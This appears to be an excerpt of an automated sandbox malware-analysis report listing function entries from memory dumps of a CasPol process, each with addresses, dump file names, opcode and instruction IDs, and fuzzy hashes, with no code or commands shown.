                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15f84f028f7ce485d6a57e2067cf33da0fbea2ab23f47fccf9cc7537cfb6d75f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6416C71E1130A8FDFA0DE99DC80AAFF7F6EB84210F10492AE516E7690D234E955CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628DAAD Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4fd097b37232c7de65a077a23d3a92d47bc21ae96222ca9e833778624dcbacac
                                                                                                                                                                                                                                                    • Instruction ID: 66cf8dd68b43f010a59a81b1af905cf73ca83a49c5d9da6593cb0c02790a4d99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd097b37232c7de65a077a23d3a92d47bc21ae96222ca9e833778624dcbacac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4417370E1130A9FDB14EF65D89479EBBB6FF85340F208929E801E7281DB70994ACB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628DAC0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 112220b6f16b989501ee23ef35318b26984d8393958f07f0006cc4fbddc5f6b6
                                                                                                                                                                                                                                                    • Instruction ID: 494617834aa8aa9dd995a2228224c2e8b72601ac4e5624646d86cae94ed8e048
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 112220b6f16b989501ee23ef35318b26984d8393958f07f0006cc4fbddc5f6b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB416270E2120A9FDB54EF65C85479EBBB2BF85340F208829D806E72C0DBB19949CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06285599 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b606a6a8e247c141c826b8ce2a8a6f04796509bc8cb1ce9cdb7e1c7b75a4f282
                                                                                                                                                                                                                                                    • Instruction ID: 8032ba8c23d971b57d9259b373114ceeabf1ab5921da28118db5dc56a34b6403
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b606a6a8e247c141c826b8ce2a8a6f04796509bc8cb1ce9cdb7e1c7b75a4f282
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D419371E212178FEFB49A69CC8077EF7B6FB85310F248926E915E7291CA34D841CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062821C5 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7d75fe4cced37bbbe9bd83aabf9a2a194859c7101d78333b111a1f97a9713fa2
                                                                                                                                                                                                                                                    • Instruction ID: d06ed92d6d3a00fcce93525784092e7d79bf0082fbf8928b7e58f66305c7da31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d75fe4cced37bbbe9bd83aabf9a2a194859c7101d78333b111a1f97a9713fa2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD31BD30B21206DFDB54AB3498547AE7BE2AB89600B244579D802DB385EF35DD46CBD1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FC70 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7b377b41e5046ea02edbda150930fbfbfde483d2d67f2caa38c8dfc96d3799b2
                                                                                                                                                                                                                                                    • Instruction ID: 32a452ea86bcd4a295c51b5bc7d2afa5f8da0aa6fcf10836854f7a90a39c1316
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b377b41e5046ea02edbda150930fbfbfde483d2d67f2caa38c8dfc96d3799b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC310832F112089FDF14BB78E94829DBBB2FB85311F108979E605D7295DF369815C790
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062821D8 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b650110735afed652d831fd7601809bc2da8c56ccb7d159dd01b084b6b1abf00
                                                                                                                                                                                                                                                    • Instruction ID: a1292e65c2f413a29d3cc194b50b21894a40f2c873197b6ab98cdb95ed059ff4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b650110735afed652d831fd7601809bc2da8c56ccb7d159dd01b084b6b1abf00
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C631F230B21206CFDB54AB74D8547AE7BE2BB89600F208569D802DB399DF35DD45C7D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06282088 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: de86655010aff43947c2eef5ea7d1bd83b22cb274914ba5f1d24484677d65251
                                                                                                                                                                                                                                                    • Instruction ID: 44302a3eee3a9ecd0e7bf2244f783b173b0215801913406a86fc6afb2b81e374
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de86655010aff43947c2eef5ea7d1bd83b22cb274914ba5f1d24484677d65251
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30316034E21205DFDB18DBA4D89469EBBF2FF89300F108529E806E7351EB71A942CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628D961 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bb9870b7d04cb9f480c9b94eb5fc6f91da5a013c6bb4bbf67f573e0893b6152f
                                                                                                                                                                                                                                                    • Instruction ID: 17735c7695b83833eba00ba5c1105aff5ca9bc901b24876113b87936807d296b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb9870b7d04cb9f480c9b94eb5fc6f91da5a013c6bb4bbf67f573e0893b6152f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731D870E2130A8FDB15DF64D89079DB7B6FF89304F108929D801E7380DBB0A94ACB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06282098 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ecb33f1c0e5a7e0feaca2db13044b98f5399c0b3ec000eb87cf681181a060f03
                                                                                                                                                                                                                                                    • Instruction ID: e507b92d13982179aa3f2b1045045b401ea0915a94358c776e58b090180d6950
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb33f1c0e5a7e0feaca2db13044b98f5399c0b3ec000eb87cf681181a060f03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7314130E21605DFCB19DF64D89469EBBB2FF89300F108519ED06E7341EB71A942CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283AA9 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: faaf14dec906aa8d660082c89423a1f85559d7bb22c27acbe40abe1672cbcb4f
                                                                                                                                                                                                                                                    • Instruction ID: c495a22ffebb125bb6aae1cef505593225ca0586ba4b9b96b0439bffabf05900
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faaf14dec906aa8d660082c89423a1f85559d7bb22c27acbe40abe1672cbcb4f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8218076F212049FDB01DFA9D881AADBBF1FB48710F148025E904E7381EB31E805CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283AB8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ab3e8d194ec0d0930e27c8264793b495777c753991ce893a43dac14bcd8f3dda
                                                                                                                                                                                                                                                    • Instruction ID: 132c774c61a84daf65b5e51e4672d82609a3cf6cb794f8296b3018e5087199d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab3e8d194ec0d0930e27c8264793b495777c753991ce893a43dac14bcd8f3dda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9218176F216199FDB40DFA9D841AADBBF1FB48710F108029E905E7381EB31E805CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00C0D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1620010106.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_c0d000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e763374ad776bce64008e7590dfec8080499a7c3fcf2fc685db92b03b39e8cab
                                                                                                                                                                                                                                                    • Instruction ID: 0ef9859a8e25a1f8cbe09917ab4fdc5bc1389dee4545444fb87eadf991551044
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e763374ad776bce64008e7590dfec8080499a7c3fcf2fc685db92b03b39e8cab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21FFB1604344DFDB14DF94D980B26BBA5EB84328F24C56DE84E4B296C37AD847CA62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00C0D005 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1620010106.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_c0d000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bb811b17c127d998f1d76bd3c0b813e2765f68afefccf4ed87aaf783d7ef0d64
                                                                                                                                                                                                                                                    • Instruction ID: 04904eb281cf477eda8477d7efe65aa71a4f1c12ead473fd4fecd14b0523d032
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb811b17c127d998f1d76bd3c0b813e2765f68afefccf4ed87aaf783d7ef0d64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04215A7550D3C09FCB13CB64C990715BF71AB46214F29C5EBD8898F6A7C23A980ACB62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06285419 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b34535d4acb28296de2a04788f636c87749fb6282e86846989bae87036428ab1
                                                                                                                                                                                                                                                    • Instruction ID: c0a7550cc0c84272bf6a93662923554707ca7a7ae37fde7de3622476b2216e21
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b34535d4acb28296de2a04788f636c87749fb6282e86846989bae87036428ab1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11E231A103098FCB60DFA5DCC1AAFFBB6FF89200F108929E155A3691D371A846CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283BC8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bbab8c257ee193d658cfba653f66e5e1fc0efa91a53eb2ec5da836c61e03c6b5
                                                                                                                                                                                                                                                    • Instruction ID: 194484bd1a5fe57c49a3fb7560d608ab4c479410b2f57dc0d2bdb4bcd295a487
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbab8c257ee193d658cfba653f66e5e1fc0efa91a53eb2ec5da836c61e03c6b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C116136B201294FDB64EBBDCC146AEBBE6BBC8750B044539D806E7384DE65DC02C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283E00 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0e08f22b6979d311d2994c0cdee71475a3047feff450c86528ccd2a3a27e6d04
                                                                                                                                                                                                                                                    • Instruction ID: 73d8dd7fccc09cc6f11f37f23b35700d63c0504ef8a973bba43c4acfd10c72b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e08f22b6979d311d2994c0cdee71475a3047feff450c86528ccd2a3a27e6d04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101D431B200111FDB64E6ADE85676FB7DADBC9B20F148439E50AC7385DE29DC038391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628ED7F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1159e26e0105ea4b254df6914b82a0bb1070fef8ff079c093abeb4b88d0a3ff2
                                                                                                                                                                                                                                                    • Instruction ID: edfe698fe74d826cb3d2a25c8f93475eb8e69595daa3334d0defc1ccde7cc4e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1159e26e0105ea4b254df6914b82a0bb1070fef8ff079c093abeb4b88d0a3ff2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28012431B251015FCB61A73C98A472E7BEAEBCA610F15857AE84ACB381DD24DC0783D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283880 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: aef0edecade98b76e1f264de1fd585a14d16c2079ec15b19644b3bf81b527476
                                                                                                                                                                                                                                                    • Instruction ID: e7e8dd6717d1d4dd95c6ceaab7b6c8088dc421c6d1777eb78464a8abb8c9a30a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aef0edecade98b76e1f264de1fd585a14d16c2079ec15b19644b3bf81b527476
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21C2B5D01219AFCB10DF9AD884BDEFFB4FB49310F50816AE918A7341C379A944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628A2F8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dab8a57280ce247df75c4dfcfa0bc9649dd90a3e6d31421431c3a212a5450ee7
                                                                                                                                                                                                                                                    • Instruction ID: 72501760d34eabf0664d7b56fac40c21212e4a5d87704841395777818aa37ec5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab8a57280ce247df75c4dfcfa0bc9649dd90a3e6d31421431c3a212a5450ee7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6017175B212154FDB60A62CD8557AE77D6EB8A750F148429E90AC7380DE15EC02C784
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283BB7 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 90fa25f4fbd3b36d95921f61564ea43b1d0f82f42180c7b61e22dfbfffeae03c
                                                                                                                                                                                                                                                    • Instruction ID: f3d2e31ae3ee89c3dcda14f19c79ab621670b44a85d45e09f9b57f8b6410450f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90fa25f4fbd3b36d95921f61564ea43b1d0f82f42180c7b61e22dfbfffeae03c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC01B132B241651FDB64EABD9C246AFBBEAABC5710F05013AD805D7284EE659802C391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283888 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 376d29fbde77242a1daacc32eb4fb4c88fd1fd4c8f2e59d54a8119866fa6274b
                                                                                                                                                                                                                                                    • Instruction ID: 381dcac66bf86247ea0f1bca86e571c2509376a6fa9aaf6a212ce68bc7e360f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 376d29fbde77242a1daacc32eb4fb4c88fd1fd4c8f2e59d54a8119866fa6274b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11E2B5D01219AFCB10DF9AD884BDEFBB4FB49310F10812AE918A7340C375A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06283E10 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 852021de7c82a4d67aeca48ef6cfdd999773dd0de71d1d2b7b540fe12ed276f8
